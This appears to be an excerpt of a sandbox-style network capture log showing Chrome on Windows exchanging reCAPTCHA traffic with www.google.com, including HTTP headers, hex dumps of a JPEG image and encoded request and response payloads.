                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:11:00 UTC697INData Raw: 36 39 32 33 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 01 2c 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                                                                                                                                                                  Data Ascii: 6923JFIFC!"$"$C,,"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:11:00 UTC1378INData Raw: ca e7 f0 c1 fe 75 3d 14 01 07 9c ff 00 c5 69 32 8e e7 e5 3f c8 e6 83 75 08 e4 ac c0 7a 98 5c 7f 4a 9e 8a 00 83 ed 76 a7 a5 cc 3f f7 d8 a7 c5 2c 72 8c c7 22 38 f5 56 cd 3e a1 78 ad e5 93 12 42 8e c3 bb 26 7f 5a 00 9e 8a 83 ec 76 9f f3 eb 07 fd fb 14 bf 64 b4 ff 00 9f 68 7f ef d8 a0 44 d4 54 3f 64 b5 ff 00 9f 68 7f ef 81 48 d6 d6 6b 8c db c0 39 e3 e4 14 0c e1 fe 2f ae ef ec bf fb 6d ff 00 b2 57 03 e5 d7 7f f1 3e 08 55 b4 e1 14 29 1f 12 67 6a 80 48 f9 71 d2 b8 df 2f da be cb 2a 9d b0 90 5e bf 9b 3e 5f 31 5f ed 32 f9 7e 48 a5 e5 fb 50 63 ab be 5f 3d 29 4c 5e d5 e8 fb 43 8a c5 2d 94 79 75 73 ca a5 f2 bd a9 7b 41 f2 94 fc be 31 8a 3c bf 6a ba 22 f6 a7 79 5e d4 bd a8 72 94 7c ba 3c ba bd e5 7b 52 f9 5e d4 7b 50 e5 28 f9 54 79 7e d5 7b ca f6 a3 ca a5 ed 03 94 a5
                                                                                                                                                                                                                                                                  Data Ascii: u=i2?uz\Jv?,r"8V>xB&ZvdhDT?dhHk9/mW>U)gjHq/*^>_1_2~HPc_=)L^C-yus{A1<j"y^r|<{R^{P(Ty~{
                                                                                                                                                                                                                                                                  2024-10-29 19:11:00 UTC1378INData Raw: ba 95 e4 a5 ee ef 1e e5 be 62 1a 53 e6 11 92 49 1c f6 24 9c fa e4 d7 dc df 67 f6 af 8c 16 df c0 f6 44 e2 2b ed 44 83 9c 92 79 ff 00 d0 45 79 19 a4 f9 f9 7e 7f a1 e9 e5 f0 b7 37 c8 34 3f 10 c6 9e 28 83 51 be b3 8a 54 17 02 76 8e 26 6c 06 18 c9 5e 78 39 ec 72 2b da db c5 9a 70 8d 64 85 5e 60 e3 3e 58 5c 10 3d c9 e3 f2 cd 78 8c 7e 20 d3 6d ee a5 7b 2f 0f db b4 64 00 a2 42 bb 97 19 e7 80 70 4e 47 e5 53 c9 e2 8d 5c a4 2b 0d b5 a5 a2 4b b5 62 38 2d 9c f4 ff 00 38 af 32 32 4b 73 d3 71 7d 0f 5c 6f 19 33 6a 3e 4c 7a 51 58 84 61 b7 13 b7 27 24 63 a6 2b 73 4f f1 7e 9c b1 ee b8 f3 61 70 33 b7 6e 41 fa 11 5f 3c c1 a9 f8 8b 51 be 6b 63 2d e4 5b 46 58 aa 04 00 7e 15 52 7b 7b c6 69 0d e5 f0 91 e3 23 28 19 df 20 e3 9d c7 81 d7 a5 4c ab 43 61 aa 73 dc fa 4e eb c6 da 1a a0
                                                                                                                                                                                                                                                                  Data Ascii: bSI$gD+DyEy~74?(QTv&l^x9r+pd^`>X\=x~ m{/dBpNGS\+Kb8-822Ksq}\o3j>LzQXa'$c+sO~ap3nA_<Qkc-[FX~R{{i#( LCasN
                                                                                                                                                                                                                                                                  2024-10-29 19:11:00 UTC1378INData Raw: 8d cc ab 90 4b 1e dc 62 bd 87 c8 3e 95 e1 ff 00 b1 cc 73 ac 7e 2a b7 b8 8e 44 68 de d4 90 e3 04 13 e7 02 3f 4a fa 04 45 cf 4a f5 30 d5 95 3a 6a 2b a1 c3 5e 95 ea 36 67 7d 9f da 94 5b fb 56 8f 93 40 88 56 df 59 31 f6 25 0f 23 3d a8 f2 3d ab 49 62 1e 94 ef 24 7a 51 f5 81 fb 13 30 41 ed 4b e4 7b 56 98 87 da 94 44 a4 91 dc 75 a5 ed c7 ec 4c d1 6f c7 4a 4f b3 fb 56 af 92 28 f2 85 1e dc 3d 89 95 f6 7f 6a 3c 8f 6a d4 31 0f 4a 4f 28 51 ed c3 d9 19 cb 07 b5 7c 45 77 a3 f8 3f 50 9d 49 d7 1d 76 80 3c b8 e4 55 1c 13 d4 11 d7 9a fb bb cb 15 f1 0d cc b7 36 90 21 86 4f 28 34 b1 a1 58 e3 55 18 66 0b d8 7b d7 0e 2e ad ec 76 e0 e9 da ff 00 23 36 5d 13 48 82 79 a1 d2 85 ed cb 08 e0 91 00 2a 41 cb b8 7e 8a 38 da ab 8f c6 ba 58 b4 ad 39 36 bc 76 b7 d8 f7 75 cf d3 92 07 e9 54
                                                                                                                                                                                                                                                                  Data Ascii: Kb>s~*Dh?JEJ0:j+^6g}[V@VY1%#==Ib$zQ0AK{VDuLoJOV(=j<j1JO(Q|Ew?PIv<U6!O(4XUf{.v#6]Hy*A~8X96vuT
                                                                                                                                                                                                                                                                  2024-10-29 19:11:00 UTC1378INData Raw: 4e 9c e5 08 c5 e8 74 41 46 7a b6 7a ac 7a a5 ab ed 0b 34 4d bb a6 18 73 52 0b fb 73 ff 00 2d 63 ff 00 be 85 79 1c 5e 33 b3 08 8d 6b 14 11 34 39 64 30 cd 80 b8 07 3c 02 0f 4c e6 92 6f 13 44 f3 45 63 63 0c d1 79 6a 5d 95 e3 7f 31 b7 63 68 07 9f 97 83 d7 ae 78 f7 b8 54 9c 95 da b0 38 c3 a1 eb eb 79 09 19 de 3f 3a 91 6e 50 8f bc 3f 3a f2 11 e3 00 b6 aa f6 f2 df 47 11 95 62 90 88 e1 66 e5 1b 8c 1c 90 7e 52 7a 71 c5 58 9f c4 f6 16 b1 b4 77 5a e5 ac 6e 1c fe f0 15 9d c0 00 70 51 10 0e 79 ef 42 ac db b2 17 24 4f 58 17 0b fd e1 51 2d e4 28 d3 48 f2 a0 50 46 49 3c 70 39 fe b5 e6 3f f0 96 35 dd 94 f2 5a 5f 5c bc 30 f9 71 ab b6 93 e4 87 2c 09 01 4b 39 27 85 6c 9c 7a 55 2b 8d 4f 57 be b6 fb 3e c9 44 6b 26 f1 1b 6d 52 4e 3a f0 01 f5 e9 43 ac d6 e5 2a 49 b3 d7 ed ef 62
                                                                                                                                                                                                                                                                  Data Ascii: NtAFzzz4MsRs-cy^3k49d0<LoDEccyj]1chxT8y?:nP?:Gbf~RzqXwZnpQyB$OXQ-(HPFI<p9?5Z_\0q,K9'lzU+OW>Dk&mRN:C*Ib
                                                                                                                                                                                                                                                                  2024-10-29 19:11:00 UTC1378INData Raw: 8c 0a 92 f2 3d 4b 51 96 c6 eb 41 b4 d1 66 c1 63 70 cc c4 a0 e5 4a e5 4f 1c e1 b8 00 8f 61 df ac f0 57 c3 59 bc 5d 77 2d 86 b5 e2 1f ec e4 29 e6 08 74 f4 3f 3f 39 20 39 db 82 3a e3 69 e3 e9 cf 35 6c 42 73 e5 b5 df ad bf 22 a3 46 4d 5d 6c 73 56 4f a9 5f 5c 3d ad 9e 9f 08 9a 08 91 1b 0a 04 88 bb 40 53 d8 fd d6 eb e8 de 86 a8 6a 3a c5 e3 eb 1e 44 97 17 77 b3 2e 33 25 84 5e 76 dc 05 51 82 31 ce 31 d3 d2 bd 17 51 f8 6f a3 f8 3f 5a 36 cb 14 d7 20 7c d0 5c 4f 21 66 64 e9 ce 30 33 c6 0f 1d ab d0 3c 37 3f 87 75 ad 3a 2d 0e f6 c6 d3 4d b8 41 b6 de 6b 68 96 25 27 d3 00 00 0f b7 43 ec 6b 9b db 37 26 95 97 cb f5 77 37 fa b7 ba 9b 67 91 58 f8 3f 5b fb 1d 95 c5 f6 83 7f 6f 6d 38 56 79 6f a7 2b 12 8e 78 da 83 70 3d 3a fb f1 5d 66 8b e0 48 15 67 cc d1 6a 31 4a 0e d4 d3 59
                                                                                                                                                                                                                                                                  Data Ascii: =KQAfcpJOaWY]w-)t??9 9:i5lBs"FM]lsVO_\=@Sj:Dw.3%^vQ11Qo?Z6 |\O!fd03<7?u:-MAkh%'Ck7&w7gX?[om8Vyo+xp=:]fHgj1JY
                                                                                                                                                                                                                                                                  2024-10-29 19:11:00 UTC1378INData Raw: a5 29 4b 72 d4 54 76 25 09 81 c9 fc 31 4b bc 28 e7 15 04 93 e7 93 cd 53 b9 ba 7d eb 0c 2a d2 4d 21 0b 1a 28 c9 62 7a 0c 52 48 1b 2f c4 97 3a 85 fc 5a 7d 8a 79 b7 33 9d aa bd 80 ee 4f a0 15 bb e2 f9 ed bc 3f a4 c7 e1 3d 31 c3 48 71 26 a1 30 ea ec 79 db fc 8e 3d 30 3d 6b 4e ca de 0f 87 fe 17 7d 4e f7 64 ba e5 e8 da 8a 79 da 7f ba 3d 87 53 ea 70 3d 2b ce 24 9e 49 e6 92 79 e5 2f 2c ac 5d d9 8f 2c 4f 53 5d 4a 3e ce 36 ea ce 77 2e 77 7e 83 f7 00 3d 2a ac ed cf 15 60 67 67 5a a9 36 0e 39 04 1a 91 93 db be 3b d7 ce 7a 3f c3 fd 42 f8 06 79 2e ae 97 d6 15 f2 e3 ff 00 be 9b 02 be 85 85 c0 ff 00 f5 d6 65 df 8b 3c 23 64 4a d8 e9 9a 8e b7 30 18 f3 2f 25 fb 3c 59 f5 08 9c 91 ec c6 b6 a5 7d 6c 65 3b 75 3c fb 41 f8 69 12 ba c4 21 b7 59 b1 f2 c7 1c 66 e6 53 fe 7d ab bb b6
                                                                                                                                                                                                                                                                  Data Ascii: )KrTv%1K(S}*M!(bzRH/:Z}y3O?=1Hq&0y=0=kN}Ndy=Sp=+$Iy/,],OS]J>6w.w~=*`ggZ69;z?By.e<#dJ0/%<Y}le;u<Ai!YfS}
                                                                                                                                                                                                                                                                  2024-10-29 19:11:00 UTC1378INData Raw: a7 a0 3a ea 0f d3 cb a8 35 df 8a fa 86 8f 60 2e a6 f0 ee 9f 32 33 00 04 3a d0 76 3e f8 f2 ba 56 11 d0 f4 82 50 b6 9a d9 43 90 43 91 fd 79 ac 1d 47 c3 da 4a de 39 96 cf 59 68 a4 73 e6 6c bb 53 1a a1 e7 e4 52 84 a9 c8 1d cf 19 ae ca 52 a3 37 6d 3f af 99 86 3b 24 ab 85 a4 e6 a9 b9 7a 5f 4f 3d 8d c9 7e 3c 4f be 48 a6 f0 89 86 54 62 ac ad a8 74 20 e0 ff 00 cb 3a b3 e1 3f da 46 d7 c3 7a bc 97 f7 5e 04 fe d2 ba 0b 88 99 b5 6f 2c 47 ea 40 f2 4f 3e f5 e5 be 3d 71 77 e2 dd 56 ea de 2c 43 e7 90 18 63 0d 8f 97 70 c7 a9 19 ae 32 ff 00 fe 3e 9b e8 2b b9 51 a7 17 74 8f 91 94 a7 6f 78 f7 df 15 fe d3 37 7e 21 d6 1a fe e7 c2 7b 10 0d b0 c2 35 2c 88 d7 d3 3e 57 27 d4 d6 72 7c 7f ce e3 ff 00 08 9f dd 00 ff 00 c8 47 df fe b9 d7 86 03 4f 8f 84 94 ff 00 b2 3f 9d 3f 63 06 ee d1
                                                                                                                                                                                                                                                                  Data Ascii: :5`.23:v>VPCCyGJ9YhslSRR7m?;$z_O=~<OHTbt :?Fz^o,G@O>=qwV,Ccp2>+Qtox7~!{5,>W'r|GO??c
                                                                                                                                                                                                                                                                  2024-10-29 19:11:00 UTC1378INData Raw: b2 95 da ad ed f3 b1 c1 f5 07 b5 7b 15 da bd e6 9d 35 bb 48 8a 66 8c a7 04 0c 64 63 35 e4 f7 5a 7a 58 68 37 da ac e5 44 77 de 1e 8e 22 42 e7 0e a1 53 9f 7f bc 41 ff 00 eb 56 75 62 d3 34 86 a7 9f 6a f1 6a 5a 57 85 34 fd 51 6f 64 44 79 d9 82 80 11 91 c3 14 18 20 e4 8f 97 db 90 47 3d 6b de 3e 12 78 82 ff 00 57 f0 aa 9b 99 3c d9 a0 3b 44 b2 b1 2c 72 33 8c 9c 9f 5e 2b 84 f1 37 85 ae b5 3f 86 32 41 62 de 79 81 53 99 00 2b e6 ef e7 ca 23 a0 1b c9 24 f1 d7 be 6b d2 bc 13 6d a4 68 1e 1b b6 87 4f bb b0 6b 71 0a ee b8 12 a9 59 58 0c 33 6e cf 3c 8a ca 85 2e 49 5d 75 2a ac 9c 9d d9 e6 3f b5 07 89 20 d1 db 40 37 91 4b 72 65 fb 4e dd bf 26 dc 79 59 ce 7e a2 bc 28 fc 52 d0 94 90 34 f9 c9 1f ed ff 00 f6 35 eb df b5 45 a5 df 8e 7f b0 2c bc 28 13 55 b9 80 dc 89 9a 27 50 90
                                                                                                                                                                                                                                                                  Data Ascii: {5Hfdc5ZzXh7Dw"BSAVub4jjZW4QodDy G=k>xW<;D,r3^+7?2AbyS+#$kmhOkqYX3n<.I]u*? @7KreN&yY~(R45E,(U'P
                                                                                                                                                                                                                                                                  2024-10-29 19:11:00 UTC1378INData Raw: ca 77 15 66 63 96 42 08 20 1d a7 bf a5 67 7c 49 f8 67 a7 4b e1 d0 7c 3d 3d 89 bd 8d d1 5d 25 91 15 82 a2 ec 09 bd 9b 0a 06 33 83 df 34 94 e3 7b 49 6a c9 85 17 28 f3 9c ce 87 e2 7d 29 8f d9 ee 21 58 9d 8b ef 53 c7 96 4b 76 6c 77 cf de 20 d7 45 60 da 64 17 10 48 2f e5 fb 2b b8 49 93 7e f9 14 16 e5 b1 ed 9f 4f ce bc 96 cb 4d 8a 21 3b de b3 48 22 04 1f b3 ca 08 2d f3 0c 86 19 1d ba f4 3f 8d 76 be 04 90 ea 3a 6a 44 23 59 a7 49 0c 3e 62 28 66 61 b3 7e 4e 06 3d 3f fa dd 69 49 2b b7 b9 93 8f 2e c7 a3 78 3f c5 12 69 57 7b 6d 6f 16 c1 6e d9 90 dc 47 18 13 08 c1 c6 54 64 8c 90 3e f7 bf 15 ed 3e 05 f1 e3 ea ed aa 3d d5 83 5c c7 1d c2 8b 79 3c bf 91 54 a2 e5 49 e4 e7 3c f4 ef 5e 17 6b 05 d6 90 d3 eb 6b a0 46 b2 40 89 0d b5 bc ab bd 59 d9 f9 cb 60 05 07 76 ee 0f 07 f5
                                                                                                                                                                                                                                                                  Data Ascii: wfcB g|IgK|==]%34{Ij(})!XSKvlw E`dH/+I~OM!;H"-?v:jD#YI>b(fa~N=?iI+.x?iW{monGTd>>=\y<TI<^kkF@Y`v


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  96192.168.2.1649827142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:02 UTC998OUTPOST /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 5814
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Origin: https://www.google.com
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:11:02 UTC5814OUTData Raw: 76 3d 2d 5a 47 37 42 43 39 54 78 43 56 45 62 7a 49 4f 32 6d 34 32 39 75 73 62 26 63 3d 30 33 41 46 63 57 65 41 35 64 67 43 7a 56 43 58 75 50 37 6b 66 74 32 7a 49 67 65 6a 5f 38 77 51 53 4e 31 75 7a 59 33 53 46 75 4f 72 39 79 62 58 63 32 62 50 42 73 63 6f 6a 7a 6f 6d 54 72 35 36 63 76 6e 52 71 66 42 53 77 31 46 4e 73 4a 7a 36 66 2d 52 58 68 39 47 51 62 55 35 5f 54 72 50 6a 46 34 51 47 70 35 42 34 73 6e 79 4a 4e 61 66 6d 57 4c 61 42 5a 67 79 47 73 7a 6a 45 65 49 62 63 7a 53 49 69 78 73 63 50 6b 37 50 6a 6e 6d 4f 61 50 77 4a 79 51 5f 4d 30 63 54 43 39 38 38 63 4e 5a 45 30 71 4a 44 4b 54 56 61 4c 78 5f 74 6a 63 59 78 59 78 6e 6b 32 72 65 49 38 74 4d 69 69 58 71 35 6e 39 38 38 65 76 75 7a 4c 74 64 44 50 74 36 2d 4d 41 41 41 77 6d 6a 63 56 64 37 47 75 35 58 74
                                                                                                                                                                                                                                                                  Data Ascii: v=-ZG7BC9TxCVEbzIO2m429usb&c=03AFcWeA5dgCzVCXuP7kft2zIgej_8wQSN1uzY3SFuOr9ybXc2bPBscojzomTr56cvnRqfBSw1FNsJz6f-RXh9GQbU5_TrPjF4QGp5B4snyJNafmWLaBZgyGszjEeIbczSIixscPk7PjnmOaPwJyQ_M0cTC988cNZE0qJDKTVaLx_tjcYxYxnk2reI8tMiiXq5n988evuzLtdDPt6-MAAAwmjcVd7Gu5Xt
                                                                                                                                                                                                                                                                  2024-10-29 19:11:02 UTC694INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:02 GMT
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:11:02 UTC684INData Raw: 31 37 61 35 0d 0a 29 5d 7d 27 0a 5b 22 64 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 34 4c 6c 4b 4f 4c 65 4a 57 7a 39 5a 38 58 64 33 54 6c 4b 37 43 6c 74 41 35 68 68 69 78 43 54 33 70 71 55 63 41 41 62 4e 33 70 51 2d 70 38 72 44 6b 6d 74 30 78 52 73 75 63 41 6b 55 30 36 66 5a 6a 65 6a 7a 73 62 33 50 33 2d 33 47 50 72 74 35 77 71 76 5f 53 50 34 36 6e 77 38 2d 6a 7a 6a 67 4b 4b 62 51 32 5f 68 2d 72 31 78 69 50 4d 36 54 59 49 6a 52 65 41 6d 51 49 6e 57 6d 35 2d 44 37 4b 45 66 56 73 4c 43 4b 39 47 4b 78 43 30 72 53 33 32 39 30 55 76 52 38 44 4b 6b 35 54 6e 68 4f 4c 4a 48 44 4c 35 49 74 4b 5a 6e 65 36 66 50 31 44 68 67 51 79 37 32 67 4e 72 65 69 63 73 36 77 63 7a 67 59 71 58 65 63 6b 6d 6e 33 63 44 5f 6f 76 50 4a 4d 54 45 44 50 39 59 51 66 53 4d 73 2d 39 6f
                                                                                                                                                                                                                                                                  Data Ascii: 17a5)]}'["dresp","03AFcWeA4LlKOLeJWz9Z8Xd3TlK7CltA5hhixCT3pqUcAAbN3pQ-p8rDkmt0xRsucAkU06fZjejzsb3P3-3GPrt5wqv_SP46nw8-jzjgKKbQ2_h-r1xiPM6TYIjReAmQInWm5-D7KEfVsLCK9GKxC0rS3290UvR8DKk5TnhOLJHDL5ItKZne6fP1DhgQy72gNreics6wczgYqXeckmn3cD_ovPJMTEDP9YQfSMs-9o
                                                                                                                                                                                                                                                                  2024-10-29 19:11:02 UTC1378INData Raw: 62 53 54 76 44 75 32 75 4d 6c 52 5a 51 77 74 31 73 57 46 75 38 6b 33 79 4c 35 63 47 52 79 62 66 6d 50 2d 70 30 39 66 63 4e 62 62 68 4f 2d 68 49 7a 6a 46 46 62 34 67 54 70 42 32 68 36 57 75 32 4b 7a 2d 36 44 4a 57 77 6e 5a 35 39 37 49 6b 52 4d 41 65 7a 62 69 36 43 42 48 59 49 5a 6e 54 49 72 74 41 62 73 46 64 67 5f 49 52 68 78 46 39 45 71 7a 6c 56 4d 52 38 63 4c 33 33 34 67 2d 58 4a 69 5a 52 6f 6f 45 62 6d 34 6f 69 39 34 75 5f 45 34 45 77 70 64 55 59 73 7a 51 74 43 36 50 43 54 48 6e 32 66 36 77 79 56 59 4d 44 6e 65 2d 52 41 64 79 49 68 65 59 71 76 48 67 39 47 32 36 77 49 44 65 6f 49 70 2d 36 32 5f 54 32 66 46 4a 33 4f 2d 4c 73 5f 79 61 6a 79 74 31 39 4c 4f 31 76 37 35 53 77 6d 43 5a 38 73 6f 4c 49 31 67 64 6c 77 73 62 42 38 41 4c 31 38 71 4a 4b 46 73 6c 55
                                                                                                                                                                                                                                                                  Data Ascii: bSTvDu2uMlRZQwt1sWFu8k3yL5cGRybfmP-p09fcNbbhO-hIzjFFb4gTpB2h6Wu2Kz-6DJWwnZ597IkRMAezbi6CBHYIZnTIrtAbsFdg_IRhxF9EqzlVMR8cL334g-XJiZRooEbm4oi94u_E4EwpdUYszQtC6PCTHn2f6wyVYMDne-RAdyIheYqvHg9G26wIDeoIp-62_T2fFJ3O-Ls_yajyt19LO1v75SwmCZ8soLI1gdlwsbB8AL18qJKFslU
                                                                                                                                                                                                                                                                  2024-10-29 19:11:02 UTC1378INData Raw: 54 4b 35 59 72 73 44 4d 72 32 67 56 5a 65 2d 36 79 5a 63 36 62 50 77 41 41 56 6e 72 54 4a 57 2d 4d 67 37 54 30 43 4a 52 70 73 46 63 71 33 53 31 68 6b 44 43 4f 53 47 5a 5a 34 58 63 78 62 4e 5f 74 61 6e 55 35 67 4f 68 37 36 2d 67 61 70 77 56 68 36 66 70 53 51 47 6f 2d 47 47 53 71 74 48 6b 70 78 41 65 7a 58 67 74 56 62 58 73 42 77 30 2d 31 43 66 61 43 6e 77 53 71 6b 5a 38 49 78 63 33 38 4a 39 78 53 44 6a 70 73 5f 6f 5f 78 42 69 73 63 4f 37 36 47 75 6d 56 32 35 77 55 7a 67 79 52 65 4c 70 4b 50 67 56 6c 6a 32 61 4e 33 6a 76 54 57 35 61 78 59 75 32 6e 48 4a 38 6a 37 62 75 77 47 74 56 41 5a 76 57 31 77 38 44 4e 72 6a 64 72 49 4a 53 56 6e 79 73 53 53 35 6a 4e 54 71 31 35 59 69 34 65 4a 4a 59 42 35 75 37 6c 38 39 4c 45 66 54 61 78 63 35 67 7a 42 44 78 70 6b 51 62
                                                                                                                                                                                                                                                                  Data Ascii: TK5YrsDMr2gVZe-6yZc6bPwAAVnrTJW-Mg7T0CJRpsFcq3S1hkDCOSGZZ4XcxbN_tanU5gOh76-gapwVh6fpSQGo-GGSqtHkpxAezXgtVbXsBw0-1CfaCnwSqkZ8Ixc38J9xSDjps_o_xBiscO76GumV25wUzgyReLpKPgVlj2aN3jvTW5axYu2nHJ8j7buwGtVAZvW1w8DNrjdrIJSVnysSS5jNTq15Yi4eJJYB5u7l89LEfTaxc5gzBDxpkQb
                                                                                                                                                                                                                                                                  2024-10-29 19:11:02 UTC1378INData Raw: 6e 39 46 6d 65 31 64 45 69 59 6f 30 76 66 51 69 39 59 31 52 52 6c 61 62 4d 69 30 35 61 46 45 70 6c 73 34 38 52 64 56 74 79 43 62 68 69 37 4b 76 4e 37 6b 59 76 36 4c 68 71 4f 45 33 4c 37 47 69 36 5f 53 6c 70 75 76 4a 4b 36 51 4a 45 33 4c 79 56 48 62 72 58 64 43 61 38 71 75 5f 36 76 7a 35 78 70 34 58 63 32 4a 55 6c 78 77 73 78 5a 67 65 51 39 67 58 73 58 55 66 70 74 51 78 74 66 76 31 63 45 64 57 41 36 6f 56 43 55 54 50 49 32 41 72 31 6f 76 49 41 4c 6a 78 4f 39 69 58 41 4d 63 74 71 6b 6e 6d 73 51 74 55 75 31 73 42 50 44 37 42 63 6e 78 59 6e 42 72 68 33 5f 48 6c 6e 42 42 30 33 51 46 43 37 6b 4a 43 52 36 77 70 72 4b 2d 69 32 6f 70 48 45 74 79 64 6a 58 79 49 74 33 50 50 6f 79 47 36 30 47 79 72 76 2d 79 4e 35 33 6f 48 4d 61 32 33 61 49 45 6c 73 36 73 7a 30 63 6a
                                                                                                                                                                                                                                                                  Data Ascii: n9Fme1dEiYo0vfQi9Y1RRlabMi05aFEpls48RdVtyCbhi7KvN7kYv6LhqOE3L7Gi6_SlpuvJK6QJE3LyVHbrXdCa8qu_6vz5xp4Xc2JUlxwsxZgeQ9gXsXUfptQxtfv1cEdWA6oVCUTPI2Ar1ovIALjxO9iXAMctqknmsQtUu1sBPD7BcnxYnBrh3_HlnBB03QFC7kJCR6wprK-i2opHEtydjXyIt3PPoyG60Gyrv-yN53oHMa23aIEls6sz0cj
